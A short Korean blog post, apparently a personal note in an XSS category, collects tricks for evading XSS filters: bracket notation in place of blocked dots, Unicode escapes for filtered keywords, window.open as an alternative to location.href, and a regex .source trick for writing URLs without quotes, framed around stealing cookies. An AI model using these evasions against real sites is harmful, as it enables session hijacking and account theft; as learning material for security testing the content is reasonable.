.이 막혔을 때

`로 대체 가능

location.href

location[`href`]

window[`location`][`href`]

document[`cookie`]

String[`fromCharCode`]


location.href

이거는 

window.location

window.open (새창) 으로 우회 가능 !


각종 키워드가 필터링 되어 있을 때...

유니코드를 쓰면 우회할 수 있다.

이를테면, location은

\u006cocation

이런 식으로...


쿠키 딸 때 쿼터가 막혀있으면 String.fromCharCode() 함수를 쓰면 되지만,

필터링 되어있을 경우

이런 트릭을 쓸 수 있다.

location=/http:\/\/naver.com\?/.source


' > XSS' 카테고리의 다른 글

XSS로 아이디, 패스워드 탈취  (0) 2019.06.26
xss 익스, 필터링 우회  (0) 2018.10.17
Posted by 범고래_1

댓글을 달아 주세요